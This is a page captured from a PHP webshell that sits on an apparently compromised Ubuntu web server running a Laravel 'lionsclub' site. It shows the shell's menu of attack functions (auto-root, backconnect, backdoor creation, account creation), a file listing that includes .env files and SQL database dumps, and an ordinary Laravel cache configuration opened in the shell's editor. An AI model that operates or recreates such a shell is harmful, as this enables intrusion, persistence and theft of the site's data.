Linux lionsclub 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 161.35.52.75 | : 18.222.102.248
Cant Read [ /etc/named.conf ]
7.4.28
www-data
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
lionsclub /
core /
storage /
app /
[ HOME SHELL ]
Name
Size
Permission
Action
livewire-tmp
[ DIR ]
drwxrwxrwx
public
[ DIR ]
drwxrwxrwx
.DS_Store
18
KB
-rw-r--r--
.editorconfig
220
B
-rw-r--r--
.env
1.48
KB
-rw-r--r--
.env.example
782
B
-rw-r--r--
.gitattributes
111
B
-rw-r--r--
.gitignore
23
B
-rwxrwxrwx
.htaccess
240
B
-rw-r--r--
.styleci-20250224053614.yml
174
B
-rw-r--r--
.styleci.yml
174
B
-rw-r--r--
-20250224041248.env
1.48
KB
-rw-r--r--
-20250224080401.gitignore
23
B
-rw-r--r--
README.md
9.77
KB
-rw-r--r--
_installed
66
B
-rw-r--r--
artisan
1.65
KB
-rw-r--r--
cache.php
3.03
KB
-rw-r--r--
composer.json
1.96
KB
-rw-r--r--
fortify.php
3.04
KB
-rw-r--r--
geoip.php
4.78
KB
-rw-r--r--
installed
66
B
-rw-r--r--
output_file-20250224062625.sql
3.55
MB
-rw-r--r--
output_file-20250224082436.sql
3.55
MB
-rw-r--r--
output_file.sql
3.55
MB
-rw-r--r--
package-lock-20250224080538.js...
469.75
KB
-rw-r--r--
package-lock.json
469.75
KB
-rw-r--r--
package.json
1.1
KB
-rw-r--r--
phpunit.xml
1.17
KB
-rw-r--r--
sanctum.php
1.59
KB
-rw-r--r--
server-20250224082256.php
563
B
-rw-r--r--
server.php
563
B
-rw-r--r--
tailwind.config.js
454
B
-rw-r--r--
view.php
1.03
KB
-rw-r--r--
webpack.mix.js
598
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cache.php
<?php use Illuminate\Support\Str; return [ /* |-------------------------------------------------------------------------- | Default Cache Store |-------------------------------------------------------------------------- | | This option controls the default cache connection that gets used while | using this caching library. This connection is used when another is | not explicitly specified when executing a given caching function. | | Supported: "apc", "array", "database", "file", | "memcached", "redis", "dynamodb" | */ 'default' => env('CACHE_DRIVER', 'file'), /* |-------------------------------------------------------------------------- | Cache Stores |-------------------------------------------------------------------------- | | Here you may define all of the cache "stores" for your application as | well as their drivers. You may even define multiple stores for the | same cache driver to group types of items stored in your caches. | */ 'stores' => [ 'apc' => [ 'driver' => 'apc', ], 'array' => [ 'driver' => 'array', 'serialize' => false, ], 'database' => [ 'driver' => 'database', 'table' => 'cache', 'connection' => null, ], 'file' => [ 'driver' => 'file', 'path' => storage_path('framework/cache/data'), ], 'memcached' => [ 'driver' => 'memcached', 'persistent_id' => env('MEMCACHED_PERSISTENT_ID'), 'sasl' => [ env('MEMCACHED_USERNAME'), env('MEMCACHED_PASSWORD'), ], 'options' => [ // Memcached::OPT_CONNECT_TIMEOUT => 2000, ], 'servers' => [ [ 'host' => env('MEMCACHED_HOST', '127.0.0.1'), 'port' => env('MEMCACHED_PORT', 11211), 'weight' => 100, ], ], ], 'redis' => [ 'driver' => 'redis', 'connection' => 'cache', ], 'dynamodb' => [ 'driver' => 'dynamodb', 'key' => env('AWS_ACCESS_KEY_ID'), 'secret' => env('AWS_SECRET_ACCESS_KEY'), 'region' => env('AWS_DEFAULT_REGION', 'us-east-1'), 'table' => env('DYNAMODB_CACHE_TABLE', 'cache'), 'endpoint' => env('DYNAMODB_ENDPOINT'), ], ], /* |-------------------------------------------------------------------------- | Cache Key Prefix |-------------------------------------------------------------------------- | | When utilizing a RAM based store such as APC or Memcached, there might | be other applications utilizing the same cache. So, we'll specify a | value to get prefixed to all our keys so we can avoid collisions. | */ 'prefix' => env('CACHE_PREFIX', Str::slug(env('APP_NAME', 'laravel'), '_').'_cache'), ];
Close